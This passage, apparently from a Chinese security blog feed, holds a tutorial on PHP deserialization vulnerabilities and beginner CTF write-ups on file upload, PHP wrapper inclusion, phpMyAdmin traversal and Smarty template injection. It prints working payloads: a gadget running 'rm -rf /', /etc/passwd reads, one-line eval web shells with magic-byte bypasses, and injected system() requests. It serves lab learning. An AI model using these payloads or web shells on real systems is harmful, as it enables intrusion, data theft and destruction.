class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">  class S&#123;</span><br><span class="line">    public $test=&quot;pikachu&quot;;</span><br><span class="line">  &#125;</span><br><span class="line">  $s=new S();//创建一个对象</span><br><span class="line">  serialize($s);//把这个对象进行序列化</span><br><span class="line">  序列化得到的结果是：0:1:&quot;S&quot;:1:&#123;s:4:&quot;test&quot;;s:7:&quot;pikachu&quot;&#125;</span><br><span class="line">    每个字符的含义：</span><br><span class="line">    0:代表object</span><br><span class="line">    1:代表对象名字长度为一个字符（上面创建的对象S）</span><br><span class="line">    S:对象的名称</span><br><span class="line">    1:代表对象里面有一个变量</span><br><span class="line">    s:数据类型</span><br><span class="line">    4:变量名称的长度</span><br><span class="line">    test:变量名称</span><br><span class="line">    s:数据类型</span><br><span class="line">    7:变量值的长度</span><br><span class="line">    pikachu</span><br><span class="line">序列化后字符串意义解释：</span><br><span class="line">变量类型：类名长度（字节）：类名：属性数量：&#123;属性名类型：属性名长度：属性值长度：属性值内容&#125;</span><br></pre></td></tr></table></figure><p>我们可以注意到，声明字段这里与例题都用的是public，除此之外还有protected和private。</p><p>其中，三者在序列化后的字符串表示区别如下：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">private变量会被序列化为：\x00类名\x00变量名</span><br><span class="line">protected变量会被序列化为：\x00*\x00变量名</span><br><span class="line">public变量会被序列化为：变量名</span><br></pre></td></tr></table></figure><h3 id="2反序列化unserialize"><a class="markdownIt-Anchor" href="#2反序列化unserialize"></a> 2.反序列化unserialize()</h3><p>知道了序列化是什么，反序列化自然就是反着来，将字符串转化为对象，而反序列化漏洞，其实就是利用应用程序本身在反序列化过程中缺乏对传入数据有足够的验证和过滤，导致攻击者可以利用构造的恶意的序列化数据来执行攻击。</p><h2 id="二魔术方法详解"><a class="markdownIt-Anchor" href="#二魔术方法详解"></a> 二.魔术方法详解</h2><p>ps:谁取的名字，<s>好抽象()</s></p><p>序列化和反序列化本身是正常的，但是如果用户可以控制反序列化的内容，并且PHP魔法函数使用不正当，就会产生漏洞，导致安全性问题。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">__construct()       //类的构造函数，创建对象时触发</span><br><span class="line">__destruct()        //类的析构函数，对象被销毁时触发</span><br><span class="line">__call()            //调用对象不可访问、不存在的方法时触发</span><br><span class="line">__callStatic()     //在静态上下文中调用不可访问的方法时触发</span><br><span class="line">__get()            //调用不可访问、不存在的对象成员属性时触发</span><br><span class="line">__set()           //在给不可访问、不存在的对象成员属性赋值时触发</span><br><span class="line">__isset()         //当对不可访问属性调用isset()或empty()时触发</span><br><span class="line">__unset()         //在不可访问的属性上使用unset()时触发</span><br><span class="line">__invoke()        //把对象当初函数调用时触发</span><br><span class="line">__sleep()        //执行serialize()时，立即被调用</span><br><span class="line">__wakeup()       //执行unserialize()时，立即被调用</span><br><span class="line">__toString()     //把对象当成字符串调用时触发</span><br><span class="line">__clone()        //使用clone关键字拷贝完一个对象后触发</span><br></pre></td></tr></table></figure><h3 id="魔术方法的简单利用"><a class="markdownIt-Anchor" href="#魔术方法的简单利用"></a> 魔术方法的简单利用</h3><h4 id="1__destruct"><a class="markdownIt-Anchor" href="#1__destruct"></a> 1.__destruct()</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">class Exploit &#123;</span><br><span class="line">    public $cmd = &quot;id&quot;;</span><br><span class="line">    function __destruct() &#123;</span><br><span class="line">        system($this-&gt;cmd);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$exploit = new Exploit();</span><br><span class="line">$exploit-&gt;cmd = &quot;rm -rf /&quot;;</span><br><span class="line">echo serialize($exploit);</span><br></pre></td></tr></table></figure><p>当反序列化时，若程序终止，__destruct()就会被触发，然后就会执行system。</p><h4 id="2__wakeup"><a class="markdownIt-Anchor" href="#2__wakeup"></a> 2.__wakeup ()</h4><p>前面提到了不再说。</p><h4 id="3__tostring"><a class="markdownIt-Anchor" href="#3__tostring"></a> 3.__toString ()</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">class FileReader &#123;</span><br><span class="line">    public $filename = &quot;index.php&quot;;</span><br><span class="line">    </span><br><span class="line"></span><br><span class="line">    function __toString() &#123;</span><br><span class="line">        return file_get_contents($this-&gt;filename);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">// 正常使用</span><br><span class="line">$reader = new FileReader();</span><br><span class="line">echo $reader; // 输出index.php内容</span><br><span class="line"></span><br><span class="line">// 恶意构造</span><br><span class="line">$malicious = &#x27;O:9:&quot;FileReader&quot;:1:&#123;s:8:&quot;filename&quot;;s:10:&quot;/etc/passwd&quot;;&#125;&#x27;;</span><br><span class="line">echo unserialize($malicious); // 输出/etc/passwd内容</span><br></pre></td></tr></table></figure><p>当攻击者能够控制filename属性时，可以通过反序列化该对象并将其转换为字符串，读取任意文件内容。</p><h2 id="三解决方案可能"><a class="markdownIt-Anchor" href="#三解决方案可能"></a> 三.解决方案(可能)</h2><p>本文参考：<a href="https://blog.csdn.net/m0_73185293/article/details/131353031?ops_request_misc=elastic_search_misc&amp;request_id=8ff314bcf608370722c03309849e536f&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_positive~default-1-131353031-null-null.nonlogin&amp;utm_term=php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E&amp;spm=1018.2226.3001.4187">php反序列化漏洞(万字详解)-CSDN博客</a></p>]]>
    </content>
    <id>https://cl1ck-t0.github.io/2026/02/02/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/</id>
    <link href="https://cl1ck-t0.github.io/2026/02/02/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/"/>
    <published>2026-02-02T12:52:49.000Z</published>
    <summary>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" cla]]>
    </summary>
    <title>PHP反序列化漏洞</title>
    <updated>2026-02-19T13:12:26.449Z</updated>
  </entry>
  <entry>
    <author>
      <name>Cl1ck-t0</name>
    </author>
    <category term="writeup" scheme="https://cl1ck-t0.github.io/tags/writeup/"/>
    <content>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1 id="来几个writeup"><a class="markdownIt-Anchor" href="#来几个writeup"></a> 来几个writeup</h1><p>这里将长期更新我作为新手遇到的有趣的题目的个人做题想法与见解，不定期更新，写手水平较菜，有问题请提出哦。</p><h2 id="一攻防世界"><a class="markdownIt-Anchor" href="#一攻防世界"></a> 一.攻防世界</h2><h3 id="1php2web"><a class="markdownIt-Anchor" href="#1php2web"></a> 1.php2(web)</h3><p>首页我们可以看到：</p><p>Can you anthenticate to this website?</p><p>在这里我们首要想到尝试访问首页和一些关键目录及敏感文件</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">/index.phps </span><br><span class="line">/login.phps </span><br><span class="line">/admin.phps </span><br><span class="line">/config.phps </span><br><span class="line">/flag.phps </span><br><span class="line">/backup.phps </span><br><span class="line">/index.php.bak </span><br><span class="line">/login.php.bak </span><br><span class="line">/index.php~ </span><br><span class="line">/.index.php.swp </span><br><span class="line">#带s和不带s的都尝试一下</span><br></pre></td></tr></table></figure><p>(当然也可以使用御剑或deresearch直接扫描)</p><p>尝试过后，我们得到/index.phps 存在源码泄露如下：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if(&quot;admin&quot;===$_GET[id]) &#123;</span><br><span class="line">  echo(&quot;&lt;p&gt;not allowed!&lt;/p&gt;&quot;);</span><br><span class="line">  exit();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$_GET[id] = urldecode($_GET[id]);</span><br><span class="line">if($_GET[id] == &quot;admin&quot;)</span><br><span class="line">&#123;</span><br><span class="line">  echo &quot;&lt;p&gt;Access granted!&lt;/p&gt;&quot;;</span><br><span class="line">  echo &quot;&lt;p&gt;Key: xxxxxxx &lt;/p&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><p>由此我们可以知道可以尝试修改URL，加上身份标识，且进行urlencode编码(因为源码urldecode会自动解码)；</p><p>不妨试试直接</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://61.147.171.35:63879/index.php?id=admin</span><br></pre></td></tr></table></figure><p>发现返回：not allowed!</p><p>说明我们的猜想是对的，那么进行urlencode再加入：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://61.147.171.35:63879/index.php?id=%61%64%6d%69%6e</span><br></pre></td></tr></table></figure><p>发现仍然返回：not allowed!</p><p>为什么呢？因为浏览器会自动对URL进行一次urldecode，在转入的一瞬间浏览器重新解码为admin</p><p>因此我们只要对其进行二次编码即可：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://61.147.171.35:63879/index.php?id=%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65</span><br></pre></td></tr></table></figure><p>最终得到flag：</p><p>cyberpeace{c5df0b4661f5fe3d57b964a152b41b7a}</p><h3 id="2catcatcatmisc"><a class="markdownIt-Anchor" href="#2catcatcatmisc"></a> 2.CatCatCat(misc)</h3><p>首先先说明一点，本题要用到kali Linux shell的基础操作~~(本人也不清楚有没有其他更好的方法)~~</p><p>我们看到该题提供了一张jpg图片和一串文本，先看看图片：</p><p>我们按惯例先把图片放进010看看它的十六进制文本，文件头和尾均没有发现什么可疑点，因此我们考虑直接用最原始的方法暴力扫描图片的信息，这时候就要用到kali shell了。</p><p>(二编：对不起啊010大人，我错怪你了，010直接检索flag字符串可以直接得到密码QAQ)</p><p>这里我提一嘴，kali虚拟机初始账号密码默认为kali，但在部分场景可能存在权限不足的问题，所以我们可以为root设立初始密码，方便以后的使用：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo passwd root</span><br></pre></td></tr></table></figure><p>回到正题，我们将猫猫.jpg复制到kali桌面上，然后cd到桌面，用strings命令查看图片所含有的所有隐藏字符，其中有一段尤为明显：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">passwordis..catflag..</span><br></pre></td></tr></table></figure><p>可能是暗示我们某个密码是catflag？</p><p>然后我们看向文本，文本标题为“我养了一只叫兔子的91岁的猫猫”，出于敏锐，我们可以猜测可能与Rabbit加密有关，我们网上找一个rabbit加解密网站，发现解密需要密钥，可能就是刚刚在图片扫描得来的：catflag？</p><p>试着解密得到：一段大概长这样的：（较长只截取一小段）</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[BBo!9/DC&gt;ie5HE%*6YPIlxaxeQ.IzI9g1RLRf%PjWi8of+s)d[8y|u5.cL]D)=9W/HqUYt3P_o%&quot;3P_oj&quot;3P_o6cTf=[jBo!9/DC&gt;ie5HE%*6YPIlxaxeQ.IzI9g1RLRf%PjWi8of+s)d[8y|u5.cL]DW35W/HqUYt3P_ow&quot;3P_ow&quot;3P_o6cTf=[BBo!9/DC&gt;ie5HE%*6YPIlxaxeQ.IzI9g1RLRf%PjWi8of+s)QI8y|u5.cL]D)=9W/HqUYtA</span><br></pre></td></tr></table></figure><p>再根据文本名的91~~（不是暗广）~~，我们猜测为base91编码，丢进去解密得到大概长这样：（一小段）</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">cat. cat. cat. cat. cat. cat. cat. cat. cat. cat. cat. cat. cat. cat. cat.</span><br><span class="line">cat. cat! cat? cat! cat! cat. cat? cat. cat. cat. cat. cat. cat. cat. cat.</span><br><span class="line">cat. cat. cat. cat. cat. cat. cat. cat. cat? cat. cat? cat! cat. cat? cat.</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>与题目的猫相同，这里我们就可以确定方向应该是正确的了，根据特征判断为Ook语言，解密得到flag：</p><p>CATCTF{Th1s_V3ry_cute_catcat!!!}</p><p>(kali shell我爱你ლ(′◉❥◉｀ლ))</p><h3 id="3ics-06web"><a class="markdownIt-Anchor" href="#3ics-06web"></a> 3.ics-06(web)</h3><p>这题其实没什么难度，主要是我第一次使用burpsuite的intruder模块爆破，感觉挺好玩的()</p><p>个人做题时手动试了一下修改URL后面的数字无效后去搜索了一下如何快速尝试然后发现bp可以做到()</p><p>这里就简单提一嘴做法，先用bp抓包发送到intruder模块，然后设置id=$$  的payload，选择numbers进行爆破,很快我们就能发现id=2333时响应长度与众不同，回浏览器试了一下便能得到flag。</p><p>另外，weak_auth这题做法类似，不展开说明。</p><h3 id="4view_source"><a class="markdownIt-Anchor" href="#4view_source"></a> 4.view_source</h3><p>这题我们打开后发现右键被禁用无法查看页面源代码，结合题目我们可以尝试在URL前加入view_source：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">view-source:http://61.147.171.105:61223/</span><br></pre></td></tr></table></figure><p>这样可以强制查看页面源代码得到flag。</p><p>ps：如果不知道这种做法也可以直接打开burpsuite查看HTML记录。</p><h3 id="5web_php_includeweb"><a class="markdownIt-Anchor" href="#5web_php_includeweb"></a> 5.Web_php_include(web)</h3><p>这题真的十分震惊小灯我()，一打开来就是PHP代码审计，粗略地看一眼感觉像是PHP伪协议，由于本人学习浅薄，百般尝试无果后去寻找大佬们帮助，发现这题的做法非常多且自由()。。。而且涉及到的知识点较为广，包含但不限于SQL,php伪协议等。值得深入探究，故做此题解QAQ。</p><p>首先题目给了一个这样的代码：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">show_source(__FILE__);</span><br><span class="line">echo $_GET[&#x27;hello&#x27;];</span><br><span class="line">$page=$_GET[&#x27;page&#x27;];</span><br><span class="line">while (strstr($page, &quot;php://&quot;)) &#123;</span><br><span class="line">  $page=str_replace(&quot;php://&quot;, &quot;&quot;, $page);</span><br><span class="line">&#125;</span><br><span class="line">include($page);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><p>我们很清楚地可以看到代码对于php：//做出了过滤，但显然过滤并不严格，我们可以用最简单的大小写绕过PHP://来完成绕过。</p><h4 id="writeup01"><a class="markdownIt-Anchor" href="#writeup01"></a> writeup01</h4><p>这是我能想到最简单的做法了()</p><p>题目很清楚地明示我们这题与php伪协议有关，我们就要考虑相关知识，我们知道php://input可以访问请求的原始数据的只读流，将post请求的数据当作php代码执行。当传入的参数作为文件名打开时，可以将参数设为php://input,同时post想设置的文件内容，php执行时会将post内容当作文件内容。从而导致任意代码执行。</p><p>因此我们打开burpsuite抓包，将得到的包改为：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">GET /?page=PHP://input HTTP/1.1</span><br><span class="line">Host: 61.147.171.105:51940</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</span><br><span class="line">Accept-Encoding: gzip, deflate, br</span><br><span class="line">Connection: keep-alive</span><br><span class="line">Content-Length: 40</span><br><span class="line"></span><br><span class="line">&lt;?php system(&#x27;ls&#x27;)?&gt;</span><br></pre></td></tr></table></figure><p>这样我们就可以得到响应如下：</p><p>fl4gisisish3r3.php<br />index.php<br />phpinfo.php</p><p>对此我们再进行改包得到：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">GET /?page=PHP://input HTTP/1.1</span><br><span class="line">Host: 61.147.171.105:51940</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</span><br><span class="line">Accept-Encoding: gzip, deflate, br</span><br><span class="line">Connection: keep-alive</span><br><span class="line">Content-Length: 40</span><br><span class="line"></span><br><span class="line">&lt;?php system(&#x27;cat fl4gisisish3r3.php&#x27;)?&gt;</span><br></pre></td></tr></table></figure><p>直接得到flag：ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}</p><p>从这样看这道题还是蛮简单的(),但是我在网上查了一下，看到了好多震撼小灯的解法emmmmmm，这里也一个个去尝试了一下，在这里分享一下：</p><h4 id="writeup02"><a class="markdownIt-Anchor" href="#writeup02"></a> writeup02</h4><p>先鸽着，会补的！！！</p><h4 id="writeup03"><a class="markdownIt-Anchor" href="#writeup03"></a> writeup03</h4><h3 id="5upload1web"><a class="markdownIt-Anchor" href="#5upload1web"></a> 5.upload1(web)</h3><p>本题开头让你上传文件，根据经验应该是一句话木马，在尝试后发现只能上传jpg，png文件，于是在本地新建文本文档，然后写一句话木马如下：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">@eval($_POST[&#x27;123&#x27;]);</span><br><span class="line">echo(&#x27;123&#x27;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><p>这里以上述代码为例，稍微讲一下一句话木马的基本原理：</p><p>1.php代码的内容部分要包裹在</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php ?&gt;</span><br></pre></td></tr></table></figure><p>里，才能被服务器所解析；</p><p>2.@在代码中的作用是令服务器不报错，即使错误也不报错，减少服务器报错而泄露密码（也就是代码中的“123”）；</p><p>3.eval()函数的作用:</p><p>eval(“echo ‘123’”);的作用是echo ‘123’,句子连起来就变为用post方法接收变量123，也就是执行123.</p><p><strong>注意</strong>(骗你的其实不重要)</p><p>一句话木马写完记得点保存(我才不会说我因为没保存导致没有echoQAQ)</p><p>然后把后缀改为jpg直接上传，用burpsuite抓包后改后缀为php后放行，若上传文件后缀名为php说明成功。</p><p>再进入文件路径，若页面有123便是成功。</p><p>然后用蚁剑连接，密码就是自己设置的123；(注意URL要文件详细路径才能连接成功)</p><p>然后找到flag。</p><p><strong>注：当后缀为.php的文件无法上传时，我们可以考虑php3,php5,pht,phtml,phps，这些都是php可运行的文件拓展名。</strong></p><h2 id="二buuctf"><a class="markdownIt-Anchor" href="#二buuctf"></a> 二.buuctf</h2><h3 id="1gxyctf2019babyupload"><a class="markdownIt-Anchor" href="#1gxyctf2019babyupload"></a> 1.[GXYCTF2019]BabyUpload</h3><p>这道upload真的非常狡猾，搞了半天才解决，遂记录。</p><p>这题我们打开靶机，经典的文件上传。我们试着传入最简单的一句话木马：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">@eval($_POST[&#x27;123&#x27;]);</span><br><span class="line">echo(&#x27;123&#x27;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><p>发现提示&quot;明显是php&quot;，说明有对部分木马语句的检查过滤；</p><p>于是我们修改后缀为php，发现ph后缀都被过滤；</p><p>提示上传类型有限制，于是我们修改content-type字段，一个个尝试，发现image/gif 和image/png都无效，最终image/jpeg有效上传。</p><p>再尝试不同格式的一句话木马:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language=&#x27;php&#x27;&gt;eval($_POST[cmd]);&lt;/script&gt;</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GIF89a</span><br><span class="line">@eval($_POST[&quot;a&quot;]);</span><br></pre></td></tr></table></figure><p>成功。</p><p><strong>注：</strong></p><p>这里<strong>GIF89a</strong>属于文件幻术头；这里总结了部分常见的文件类型头部，到时可转换为十六进制放在头部</p><p>二编：GIF89a可以直接放到木马脚本的前面，因为上传的时候前端回将其编码为47 49 46 38 39 61（这里再burp抓到的包可以看到hex）。而其他几种文件的幻术头解码为字符串放到木马脚本前面再传的时候还是不行（因为解码出来有些不是机器码所以复制的时候回乱码）这里可以直接去burp里面改16进制包（在不破坏包的情况下改木马前面的十六进制）。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">JPEG文件（.jpg或.jpeg）的幻术头：FF D8 FF</span><br><span class="line">PNG文件（.png）的幻术头：89 50 4E 47 0D 0A 1A 0A</span><br><span class="line">GIF文件（.gif）的幻术头：47 49 46 38 39 61 或 47 49 46 38 37 61</span><br><span class="line">BMP文件（.bmp）的幻术头：42 4D</span><br><span class="line">TIFF文件（.tif或.tiff）的幻术头：4D 4D 00 2A 或 49 49 2A 00</span><br><span class="line">ICO文件（.ico）的幻术头：00 00 01 00</span><br><span class="line">WebP文件（.webp）的幻术头：52 49 46 46 xx xx xx xx 57 45 42 50，其中 xx 是文件大小的字节序列</span><br></pre></td></tr></table></figure><p>但是访问 /upload 目录的时候发现了 403 错误。给出了靶场中间件的版本是 Apache ；</p><p>于是我们考虑.hitaccess文件，这里同样要把content-type字段改为image/jpeg才能上传哦()</p><p>然后就是链接蚁剑，拿到flag！！！</p><p><strong>总结：</strong></p><p>本题主要问题在于白名单以及.hitaccess文件，建议自行整理一下一句话木马的类型QAQ</p><h3 id="2gwctf-2019我有一个数据库"><a class="markdownIt-Anchor" href="#2gwctf-2019我有一个数据库"></a> 2.[GWCTF 2019]我有一个数据库</h3><p>关于phpmyadmin版本的漏洞<a href="https://mp.weixin.qq.com/s?__biz=MzIzMTc1MjExOQ==&amp;mid=2247485036&amp;idx=1&amp;sn=8e9647906c5d94f72564dec5bc51a2ab&amp;chksm=e89e2eb4dfe9a7a28bff2efebb5b2723782dab660acff074c3f18c9e7dca924abdf3da618fb4&amp;mpshare=1&amp;scene=1&amp;srcid=0621gAv1FMtrgoahD01psMZr&amp;pass_ticket=LqhRfckPxAVG2dF/jxV/9/cEb5pShRgewJe/ttJn2gIlIyGF/bsgGmzcbsV%2bLmMK#rd">本文参考</a></p><p><a href="https://www.cnblogs.com/LoYoHo00/articles/15460386.html">图片来源</a></p><p>打开来长这样：</p><p><img src="https://img2020.cnblogs.com/blog/2443617/202110/2443617-20211025195732455-886901125.png" alt="img" /></p><p>这里我看了源代码发现啥都没有，结合题目便尝试robots协议，发现了phpinfo.php;结果进入环境变量看发现没有flag，于是我们使用御剑扫描工具得到了<a href="http://f7d68f86-5e2c-4fbd-aba2-67734794e580.node5.buuoj.cn:81/phpmyadmin/">http://f7d68f86-5e2c-4fbd-aba2-67734794e580.node5.buuoj.cn:81/phpmyadmin/</a></p><p>访问后发现是个phpmyadmin的页面就知道方向对了，然后。。。。。。就不懂了QAQ</p><p>网上查找资料发现漏洞便构造payload：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://f7d68f86-5e2c-4fbd-aba2-67734794e580.node5.buuoj.cn:81/phpmyadmin/?target=db_sql.php%253f/../../../../../../flag</span><br></pre></td></tr></table></figure><p>最终得到：flag{c3903d66-8939-4f91-a849-ae5ed1c106a1}</p><h3 id="3ciscn2019-华东南赛区web11"><a class="markdownIt-Anchor" href="#3ciscn2019-华东南赛区web11"></a> 3.[CISCN2019 华东南赛区]Web11</h3><p>本题看看源代码很清楚的告诉我们是SSTI中的smarty模版，于是尝试使用phpinfo环境变量里并无flag，于是去网上查找相关资料</p><p>前置知识:</p><h4 id="1php标签"><a class="markdownIt-Anchor" href="#1php标签"></a> (1.{php}标签</h4><p>Smarty已经废弃{php}标签，强烈建议不要使用。在Smarty 3.1，{php}仅在SmartyBC中可用。</p><h4 id="2literal标签"><a class="markdownIt-Anchor" href="#2literal标签"></a> (2.{literal}标签</h4><p>{literal}可以让一个模板区域的字符原样输出。这经常用于保护页面上的Javascript或css样式表，避免因为Smarty的定界符而错被解析。</p><p><strong>PHP5中可用</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language=&quot;php&quot;&gt;phpinfo();&lt;/script&gt;</span><br></pre></td></tr></table></figure><h4 id="3getstreamvariable方法"><a class="markdownIt-Anchor" href="#3getstreamvariable方法"></a> (3.getStreamVariable方法</h4><p>这个方法可以读取一个文件并返回其内容，可以用self来获取Smarty对象并调用这个方法</p><p><strong>新版本smarty已将该静态方法删除</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload：&#123;self::getStreamVariable(&quot;file:///etc/passwd&quot;)&#125;</span><br></pre></td></tr></table></figure><h4 id="4if标签"><a class="markdownIt-Anchor" href="#4if标签"></a> (4.{if}标签</h4><p>Smarty的{if}条件判断和PHP的if 非常相似，只是增加了一些特性。每个{if}必须有一个配对的{/if}. 也可以使用{else} 和 {elseif}. 全部的PHP条件表达式和函数都可以在if内使用，如*||<em>,<em>or</em>,</em>&amp;&amp;*,<em>and</em>,<em>is_array()</em>, 等等</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;if phpinfo()&#125;&#123;/if&#125;</span><br></pre></td></tr></table></figure><p>根据页面提示，我们添加xff头：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">X-Forwarded-For: &#123;if readfile(&#x27;/flag&#x27;)&#125;&#123;/if&#125;</span><br></pre></td></tr></table></figure><p>得到flag</p><h2 id="三nssctf"><a class="markdownIt-Anchor" href="#三nssctf"></a> 三.NSSCTF</h2><h3 id="1easy_md5"><a class="markdownIt-Anchor" href="#1easy_md5"></a> 